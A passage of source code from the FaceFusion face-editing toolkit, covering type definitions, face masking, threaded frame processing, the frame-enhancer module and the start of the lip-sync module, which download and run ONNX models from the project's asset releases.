'teen', 'adult', 'senior'] FaceAnalyserGender = Literal['female', 'male'] FaceDetectorModel = Literal['many', 'retinaface', 'scrfd', 'yoloface', 'yunet'] FaceDetectorTweak = Literal['low-luminance', 'high-luminance'] FaceRecognizerModel = Literal['arcface_blendswap', 'arcface_inswapper', 
'arcface_simswap', 'arcface_uniface'] FaceMaskType = Literal['box', 'occlusion', 'region'] FaceMaskRegion = Literal['skin', 'left-eyebrow', 'right-eyebrow', 'left-eye', 'right-eye', 'glasses', 'nose', 'mouth', 'upper-lip', 'lower-lip'] TempFrameFormat = Literal['jpg', 'png', 'bmp'] OutputVideoEncoder = Literal['libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc', 'h264_amf', 'hevc_amf'] OutputVideoPreset = Literal['ultrafast', 'superfast', 'veryfast', 'faster', 'fast', 'medium', 'slow', 'slower', 'veryslow'] ModelValue = Dict[str, Any] ModelSet = Dict[str, ModelValue] OptionsWithModel = TypedDict('OptionsWithModel', { 'model' : ModelValue }) ValueAndUnit = TypedDict('ValueAndUnit', { 'value' : str, 'unit' : str }) ExecutionDeviceFramework = TypedDict('ExecutionDeviceFramework', { 'name' : str, 'version' : str }) ExecutionDeviceProduct = TypedDict('ExecutionDeviceProduct', { 'vendor' : str, 'name' : str }) ExecutionDeviceVideoMemory = TypedDict('ExecutionDeviceVideoMemory', { 'total' : ValueAndUnit, 'free' : ValueAndUnit }) ExecutionDeviceUtilization = TypedDict('ExecutionDeviceUtilization', { 'gpu' : ValueAndUnit, 'memory' : ValueAndUnit }) ExecutionDevice = TypedDict('ExecutionDevice', { 'driver_version' : str, 'framework' : ExecutionDeviceFramework, 'product' : ExecutionDeviceProduct, 'video_memory' : ExecutionDeviceVideoMemory, 'utilization' : ExecutionDeviceUtilization }) File: facefusion/thread_helper.py from typing import List, Union, ContextManager import threading from contextlib import nullcontext THREAD_LOCK : threading.Lock = threading.Lock() THREAD_SEMAPHORE : threading.Semaphore = threading.Semaphore() NULL_CONTEXT : ContextManager[None] = nullcontext() def thread_lock() -> threading.Lock: return THREAD_LOCK def thread_semaphore() -> threading.Semaphore: return THREAD_SEMAPHORE def conditional_thread_semaphore(execution_providers : List[str]) -> Union[threading.Semaphore, ContextManager[None]]: if 'DmlExecutionProvider' in execution_providers: return THREAD_SEMAPHORE return NULL_CONTEXT File: facefusion/face_masker.py from typing import Any, Dict, List from cv2.typing import Size from functools import lru_cache from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals from facefusion import process_manager from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import FaceLandmark68, VisionFrame, Mask, Padding, FaceMaskRegion, ModelSet from facefusion.execution import apply_execution_provider_options from facefusion.filesystem import resolve_relative_path, is_file from facefusion.download import conditional_download FACE_OCCLUDER = None FACE_PARSER = None MODELS : ModelSet =\ { 'face_occluder': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/face_occluder.onnx', 'path': resolve_relative_path('../.assets/models/face_occluder.onnx') }, 'face_parser': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/face_parser.onnx', 'path': resolve_relative_path('../.assets/models/face_parser.onnx') } } FACE_MASK_REGIONS : Dict[FaceMaskRegion, int] =\ { 'skin': 1, 'left-eyebrow': 2, 'right-eyebrow': 3, 'left-eye': 4, 'right-eye': 5, 'glasses': 6, 'nose': 10, 'mouth': 11, 'upper-lip': 12, 'lower-lip': 13 } def get_face_occluder() -> Any: global FACE_OCCLUDER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FACE_OCCLUDER is None: model_path = MODELS.get('face_occluder').get('path') FACE_OCCLUDER = 
onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FACE_OCCLUDER def get_face_parser() -> Any: global FACE_PARSER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FACE_PARSER is None: model_path = MODELS.get('face_parser').get('path') FACE_PARSER = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FACE_PARSER def clear_face_occluder() -> None: global FACE_OCCLUDER FACE_OCCLUDER = None def clear_face_parser() -> None: global FACE_PARSER FACE_PARSER = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_urls =\ [ MODELS.get('face_occluder').get('url'), MODELS.get('face_parser').get('url') ] model_paths =\ [ MODELS.get('face_occluder').get('path'), MODELS.get('face_parser').get('path') ] if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, model_urls) process_manager.end() return all(is_file(model_path) for model_path in model_paths) @lru_cache(maxsize = None) def create_static_box_mask(crop_size : Size, face_mask_blur : float, face_mask_padding : Padding) -> Mask: blur_amount = int(crop_size[0] * 0.5 * face_mask_blur) blur_area = max(blur_amount // 2, 1) box_mask : Mask = numpy.ones(crop_size, numpy.float32) box_mask[:max(blur_area, int(crop_size[1] * face_mask_padding[0] / 100)), :] = 0 box_mask[-max(blur_area, int(crop_size[1] * face_mask_padding[2] / 100)):, :] = 0 box_mask[:, :max(blur_area, int(crop_size[0] * face_mask_padding[3] / 100))] = 0 box_mask[:, -max(blur_area, int(crop_size[0] * face_mask_padding[1] / 100)):] = 0 if blur_amount > 0: box_mask = cv2.GaussianBlur(box_mask, (0, 0), blur_amount * 0.25) return box_mask def create_occlusion_mask(crop_vision_frame : VisionFrame) -> Mask: face_occluder = get_face_occluder() prepare_vision_frame = cv2.resize(crop_vision_frame, face_occluder.get_inputs()[0].shape[1:3][::-1]) prepare_vision_frame = numpy.expand_dims(prepare_vision_frame, axis = 0).astype(numpy.float32) / 255 prepare_vision_frame = prepare_vision_frame.transpose(0, 1, 2, 3) with conditional_thread_semaphore(facefusion.globals.execution_providers): occlusion_mask : Mask = face_occluder.run(None, { face_occluder.get_inputs()[0].name: prepare_vision_frame })[0][0] occlusion_mask = occlusion_mask.transpose(0, 1, 2).clip(0, 1).astype(numpy.float32) occlusion_mask = cv2.resize(occlusion_mask, crop_vision_frame.shape[:2][::-1]) occlusion_mask = (cv2.GaussianBlur(occlusion_mask.clip(0, 1), (0, 0), 5).clip(0.5, 1) - 0.5) * 2 return occlusion_mask def create_region_mask(crop_vision_frame : VisionFrame, face_mask_regions : List[FaceMaskRegion]) -> Mask: face_parser = get_face_parser() prepare_vision_frame = cv2.flip(cv2.resize(crop_vision_frame, (512, 512)), 1) prepare_vision_frame = numpy.expand_dims(prepare_vision_frame, axis = 0).astype(numpy.float32)[:, :, ::-1] / 127.5 - 1 prepare_vision_frame = prepare_vision_frame.transpose(0, 3, 1, 2) with conditional_thread_semaphore(facefusion.globals.execution_providers): region_mask : Mask = face_parser.run(None, { face_parser.get_inputs()[0].name: prepare_vision_frame })[0][0] region_mask = numpy.isin(region_mask.argmax(0), [ FACE_MASK_REGIONS[region] for region in face_mask_regions ]) region_mask = cv2.resize(region_mask.astype(numpy.float32), 
crop_vision_frame.shape[:2][::-1]) region_mask = (cv2.GaussianBlur(region_mask.clip(0, 1), (0, 0), 5).clip(0.5, 1) - 0.5) * 2 return region_mask def create_mouth_mask(face_landmark_68 : FaceLandmark68) -> Mask: convex_hull = cv2.convexHull(face_landmark_68[numpy.r_[3:14, 31:36]].astype(numpy.int32)) mouth_mask : Mask = numpy.zeros((512, 512)).astype(numpy.float32) mouth_mask = cv2.fillConvexPoly(mouth_mask, convex_hull, 1.0) mouth_mask = cv2.erode(mouth_mask.clip(0, 1), numpy.ones((21, 3))) mouth_mask = cv2.GaussianBlur(mouth_mask, (0, 0), sigmaX = 1, sigmaY = 15) return mouth_mask File: facefusion/processors/__init__.py File: facefusion/processors/frame/globals.py from typing import List, Optional from facefusion.processors.frame.typings import FaceDebuggerItem, FaceEnhancerModel, FaceSwapperModel, FrameColorizerModel, FrameEnhancerModel, LipSyncerModel face_debugger_items : Optional[List[FaceDebuggerItem]] = None face_enhancer_model : Optional[FaceEnhancerModel] = None face_enhancer_blend : Optional[int] = None face_swapper_model : Optional[FaceSwapperModel] = None frame_colorizer_model : Optional[FrameColorizerModel] = None frame_colorizer_blend : Optional[int] = None frame_colorizer_size : Optional[str] = None frame_enhancer_model : Optional[FrameEnhancerModel] = None frame_enhancer_blend : Optional[int] = None lip_syncer_model : Optional[LipSyncerModel] = None File: facefusion/processors/frame/typings.py from typing import Literal, TypedDict from facefusion.typing import Face, FaceSet, AudioFrame, VisionFrame FaceDebuggerItem = Literal['bounding-box', 'face-landmark-5', 'face-landmark-5/68', 'face-landmark-68', 'face-landmark-68/5', 'face-mask', 'face-detector-score', 'face-landmarker-score', 'age', 'gender'] FaceEnhancerModel = Literal['codeformer', 'gfpgan_1.2', 'gfpgan_1.3', 'gfpgan_1.4', 'gpen_bfr_256', 'gpen_bfr_512', 'gpen_bfr_1024', 'gpen_bfr_2048', 'restoreformer_plus_plus'] FaceSwapperModel = Literal['blendswap_256', 'inswapper_128', 'inswapper_128_fp16', 'simswap_256', 'simswap_512_unofficial', 'uniface_256'] FrameColorizerModel = Literal['ddcolor', 'ddcolor_artistic', 'deoldify', 'deoldify_artistic', 'deoldify_stable'] FrameEnhancerModel = Literal['clear_reality_x4', 'lsdir_x4', 'nomos8k_sc_x4', 'real_esrgan_x2', 'real_esrgan_x2_fp16', 'real_esrgan_x4', 'real_esrgan_x4_fp16', 'real_hatgan_x4', 'span_kendata_x4', 'ultra_sharp_x4'] LipSyncerModel = Literal['wav2lip_gan'] FaceDebuggerInputs = TypedDict('FaceDebuggerInputs', { 'reference_faces' : FaceSet, 'target_vision_frame' : VisionFrame }) FaceEnhancerInputs = TypedDict('FaceEnhancerInputs', { 'reference_faces' : FaceSet, 'target_vision_frame' : VisionFrame }) FaceSwapperInputs = TypedDict('FaceSwapperInputs', { 'reference_faces' : FaceSet, 'source_face' : Face, 'target_vision_frame' : VisionFrame }) FrameColorizerInputs = TypedDict('FrameColorizerInputs', { 'target_vision_frame' : VisionFrame }) FrameEnhancerInputs = TypedDict('FrameEnhancerInputs', { 'target_vision_frame' : VisionFrame }) LipSyncerInputs = TypedDict('LipSyncerInputs', { 'reference_faces' : FaceSet, 'source_audio_frame' : AudioFrame, 'target_vision_frame' : VisionFrame }) File: facefusion/processors/frame/__init__.py File: facefusion/processors/frame/core.py import os import sys import importlib from concurrent.futures import ThreadPoolExecutor, as_completed from queue import Queue from types import ModuleType from typing import Any, List from tqdm import tqdm import facefusion.globals from facefusion.typing import ProcessFrames, QueuePayload from 
facefusion.execution import encode_execution_providers from facefusion import logger, wording FRAME_PROCESSORS_MODULES : List[ModuleType] = [] FRAME_PROCESSORS_METHODS =\ [ 'get_frame_processor', 'clear_frame_processor', 'get_options', 'set_options', 'register_args', 'apply_args', 'pre_check', 'post_check', 'pre_process', 'post_process', 'get_reference_frame', 'process_frame', 'process_frames', 'process_image', 'process_video' ] def load_frame_processor_module(frame_processor : str) -> Any: try: frame_processor_module = importlib.import_module('facefusion.processors.frame.modules.' + frame_processor) for method_name in FRAME_PROCESSORS_METHODS: if not hasattr(frame_processor_module, method_name): raise NotImplementedError except ModuleNotFoundError as exception: logger.error(wording.get('frame_processor_not_loaded').format(frame_processor = frame_processor), __name__.upper()) logger.debug(exception.msg, __name__.upper()) sys.exit(1) except NotImplementedError: logger.error(wording.get('frame_processor_not_implemented').format(frame_processor = frame_processor), __name__.upper()) sys.exit(1) return frame_processor_module def get_frame_processors_modules(frame_processors : List[str]) -> List[ModuleType]: global FRAME_PROCESSORS_MODULES if not FRAME_PROCESSORS_MODULES: for frame_processor in frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) FRAME_PROCESSORS_MODULES.append(frame_processor_module) return FRAME_PROCESSORS_MODULES def clear_frame_processors_modules() -> None: global FRAME_PROCESSORS_MODULES for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): frame_processor_module.clear_frame_processor() FRAME_PROCESSORS_MODULES = [] def multi_process_frames(source_paths : List[str], temp_frame_paths : List[str], process_frames : ProcessFrames) -> None: queue_payloads = create_queue_payloads(temp_frame_paths) with tqdm(total = len(queue_payloads), desc = wording.get('processing'), unit = 'frame', ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: progress.set_postfix( { 'execution_providers': encode_execution_providers(facefusion.globals.execution_providers), 'execution_thread_count': facefusion.globals.execution_thread_count, 'execution_queue_count': facefusion.globals.execution_queue_count }) with ThreadPoolExecutor(max_workers = facefusion.globals.execution_thread_count) as executor: futures = [] queue : Queue[QueuePayload] = create_queue(queue_payloads) queue_per_future = max(len(queue_payloads) // facefusion.globals.execution_thread_count * facefusion.globals.execution_queue_count, 1) while not queue.empty(): future = executor.submit(process_frames, source_paths, pick_queue(queue, queue_per_future), progress.update) futures.append(future) for future_done in as_completed(futures): future_done.result() def create_queue(queue_payloads : List[QueuePayload]) -> Queue[QueuePayload]: queue : Queue[QueuePayload] = Queue() for queue_payload in queue_payloads: queue.put(queue_payload) return queue def pick_queue(queue : Queue[QueuePayload], queue_per_future : int) -> List[QueuePayload]: queues = [] for _ in range(queue_per_future): if not queue.empty(): queues.append(queue.get()) return queues def create_queue_payloads(temp_frame_paths : List[str]) -> List[QueuePayload]: queue_payloads = [] temp_frame_paths = sorted(temp_frame_paths, key = os.path.basename) for frame_number, frame_path in enumerate(temp_frame_paths): frame_payload : QueuePayload =\ { 'frame_number': frame_number, 
'frame_path': frame_path } queue_payloads.append(frame_payload) return queue_payloads File: facefusion/processors/frame/choices.py from typing import List from facefusion.common_helper import create_int_range from facefusion.processors.frame.typings import FaceDebuggerItem, FaceEnhancerModel, FaceSwapperModel, FrameColorizerModel, FrameEnhancerModel, LipSyncerModel face_debugger_items : List[FaceDebuggerItem] = [ 'bounding-box', 'face-landmark-5', 'face-landmark-5/68', 'face-landmark-68', 'face-landmark-68/5', 'face-mask', 'face-detector-score', 'face-landmarker-score', 'age', 'gender' ] face_enhancer_models : List[FaceEnhancerModel] = [ 'codeformer', 'gfpgan_1.2', 'gfpgan_1.3', 'gfpgan_1.4', 'gpen_bfr_256', 'gpen_bfr_512', 'gpen_bfr_1024', 'gpen_bfr_2048', 'restoreformer_plus_plus' ] face_swapper_models : List[FaceSwapperModel] = [ 'blendswap_256', 'inswapper_128', 'inswapper_128_fp16', 'simswap_256', 'simswap_512_unofficial', 'uniface_256' ] frame_colorizer_models : List[FrameColorizerModel] = [ 'ddcolor', 'ddcolor_artistic', 'deoldify', 'deoldify_artistic', 'deoldify_stable' ] frame_colorizer_sizes : List[str] = [ '192x192', '256x256', '384x384', '512x512' ] frame_enhancer_models : List[FrameEnhancerModel] = [ 'clear_reality_x4', 'lsdir_x4', 'nomos8k_sc_x4', 'real_esrgan_x2', 'real_esrgan_x2_fp16', 'real_esrgan_x4', 'real_esrgan_x4_fp16', 'real_hatgan_x4', 'span_kendata_x4', 'ultra_sharp_x4' ] lip_syncer_models : List[LipSyncerModel] = [ 'wav2lip_gan' ] face_enhancer_blend_range : List[int] = create_int_range(0, 100, 1) frame_colorizer_blend_range : List[int] = create_int_range(0, 100, 1) frame_enhancer_blend_range : List[int] = create_int_range(0, 100, 1) File: facefusion/processors/frame/modules/frame_enhancer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.face_analyser import clear_face_analyser from facefusion.content_analyser import clear_content_analyser from facefusion.execution import apply_execution_provider_options from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.common_helper import create_metavar from facefusion.filesystem import is_file, resolve_relative_path, is_image, is_video from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, write_image, merge_tile_frames, create_tile_frames from facefusion.processors.frame.typings import FrameEnhancerInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'clear_reality_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/clear_reality_x4.onnx', 'path': resolve_relative_path('../.assets/models/clear_reality_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'lsdir_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/lsdir_x4.onnx', 'path': resolve_relative_path('../.assets/models/lsdir_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 
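# NOTE (added annotation, not in the original frame_enhancer.py): each MODELS
# entry bundles the download 'url', the local 'path', the 'size' tuple that is
# later handed to create_tile_frames()/merge_tile_frames() for tiled inference
# in enhance_frame(), and the 'scale' factor by which the frame dimensions are
# multiplied (x2 or x4, matching the model name).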
'nomos8k_sc_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/nomos8k_sc_x4.onnx', 'path': resolve_relative_path('../.assets/models/nomos8k_sc_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'real_esrgan_x2': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x2.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x2.onnx'), 'size': (256, 16, 8), 'scale': 2 }, 'real_esrgan_x2_fp16': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x2_fp16.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x2_fp16.onnx'), 'size': (256, 16, 8), 'scale': 2 }, 'real_esrgan_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x4.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x4.onnx'), 'size': (256, 16, 8), 'scale': 4 }, 'real_esrgan_x4_fp16': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x4_fp16.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x4_fp16.onnx'), 'size': (256, 16, 8), 'scale': 4 }, 'real_hatgan_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_hatgan_x4.onnx', 'path': resolve_relative_path('../.assets/models/real_hatgan_x4.onnx'), 'size': (256, 16, 8), 'scale': 4 }, 'span_kendata_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/span_kendata_x4.onnx', 'path': resolve_relative_path('../.assets/models/span_kendata_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'ultra_sharp_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/ultra_sharp_x4.onnx', 'path': resolve_relative_path('../.assets/models/ultra_sharp_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.frame_enhancer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--frame-enhancer-model', help = wording.get('help.frame_enhancer_model'), default = config.get_str_value('frame_processors.frame_enhancer_model', 'span_kendata_x4'), choices = frame_processors_choices.frame_enhancer_models) program.add_argument('--frame-enhancer-blend', help = wording.get('help.frame_enhancer_blend'), type = int, default = config.get_int_value('frame_processors.frame_enhancer_blend', '80'), choices = frame_processors_choices.frame_enhancer_blend_range, metavar = create_metavar(frame_processors_choices.frame_enhancer_blend_range)) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.frame_enhancer_model = args.frame_enhancer_model frame_processors_globals.frame_enhancer_blend = args.frame_enhancer_blend def 
pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() def enhance_frame(temp_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() size = get_options('model').get('size') scale = get_options('model').get('scale') temp_height, temp_width = temp_vision_frame.shape[:2] tile_vision_frames, pad_width, pad_height = create_tile_frames(temp_vision_frame, size) for index, tile_vision_frame in enumerate(tile_vision_frames): with conditional_thread_semaphore(facefusion.globals.execution_providers): tile_vision_frame = frame_processor.run(None, { frame_processor.get_inputs()[0].name : prepare_tile_frame(tile_vision_frame) })[0] tile_vision_frames[index] = normalize_tile_frame(tile_vision_frame) merge_vision_frame = merge_tile_frames(tile_vision_frames, temp_width * scale, temp_height * scale, pad_width * scale, pad_height * scale, (size[0] * scale, size[1] * scale, size[2] * scale)) temp_vision_frame = blend_frame(temp_vision_frame, merge_vision_frame) return temp_vision_frame def prepare_tile_frame(vision_tile_frame : VisionFrame) -> VisionFrame: vision_tile_frame = numpy.expand_dims(vision_tile_frame[:, :, ::-1], axis = 0) vision_tile_frame = vision_tile_frame.transpose(0, 3, 1, 2) vision_tile_frame = vision_tile_frame.astype(numpy.float32) / 255 return vision_tile_frame def normalize_tile_frame(vision_tile_frame : VisionFrame) -> VisionFrame: vision_tile_frame = vision_tile_frame.transpose(0, 2, 3, 1).squeeze(0) * 255 vision_tile_frame = vision_tile_frame.clip(0, 255).astype(numpy.uint8)[:, :, ::-1] return vision_tile_frame def blend_frame(temp_vision_frame : VisionFrame, merge_vision_frame : VisionFrame) -> VisionFrame: frame_enhancer_blend = 1 - (frame_processors_globals.frame_enhancer_blend / 100) temp_vision_frame = cv2.resize(temp_vision_frame, (merge_vision_frame.shape[1], merge_vision_frame.shape[0])) temp_vision_frame = cv2.addWeighted(temp_vision_frame, frame_enhancer_blend, merge_vision_frame, 1 - 
frame_enhancer_blend, 0) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : FrameEnhancerInputs) -> VisionFrame: target_vision_frame = inputs.get('target_vision_frame') return enhance_frame(target_vision_frame) def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(None, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/lip_syncer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.execution import apply_execution_provider_options from facefusion.face_analyser import get_one_face, get_many_faces, find_similar_faces, clear_face_analyser from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, create_mouth_mask, clear_face_occluder, clear_face_parser from facefusion.face_helper import warp_face_by_face_landmark_5, warp_face_by_bounding_box, paste_back, create_bounding_box_from_face_landmark_68 from facefusion.face_store import get_reference_faces from facefusion.content_analyser import clear_content_analyser from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, AudioFrame, QueuePayload from facefusion.filesystem import is_file, has_audio, resolve_relative_path from facefusion.download import conditional_download, is_download_done from facefusion.audio import read_static_voice, get_voice_frame, create_empty_audio_frame from facefusion.filesystem import is_image, is_video, filter_audio_paths from facefusion.common_helper import get_first from facefusion.vision import read_image, read_static_image, write_image, restrict_video_fps from facefusion.processors.frame.typings import LipSyncerInputs from facefusion.voice_extractor import clear_voice_extractor from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'wav2lip_gan': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/wav2lip_gan.onnx', 'path': resolve_relative_path('../.assets/models/wav2lip_gan.onnx') } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): 
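            # Added note: the session is created lazily; wait while the process manager is
            # still in its checking phase so the ONNX Runtime session below is only built
            # after downloads/checks finish (the same pattern as the other frame processor
            # modules in this package).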
sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.lip_syncer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--lip-syncer-model', help = wording.get('help.lip_syncer_model'), default = config.get_str_value('frame_processors.lip_syncer_model', 'wav2lip_gan'), choices = frame_processors_choices.lip_syncer_models) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.lip_syncer_model = args.lip_syncer_model def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if not has_audio(facefusion.globals.source_paths): logger.error(wording.get('select_audio_source') + wording.get('exclamation_mark'), NAME) return False if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() read_static_voice.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() clear_face_parser() clear_voice_extractor() def sync_lip(target_face : Face, temp_audio_frame : AudioFrame, temp_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() crop_mask_list = [] temp_audio_frame = prepare_audio_frame(temp_audio_frame) crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), 'ffhq_512', (512, 512)) face_landmark_68 = cv2.transform(target_face.landmarks.get('68').reshape(1, -1, 2), affine_matrix).reshape(-1, 2) bounding_box = create_bounding_box_from_face_landmark_68(face_landmark_68) bounding_box[1] 
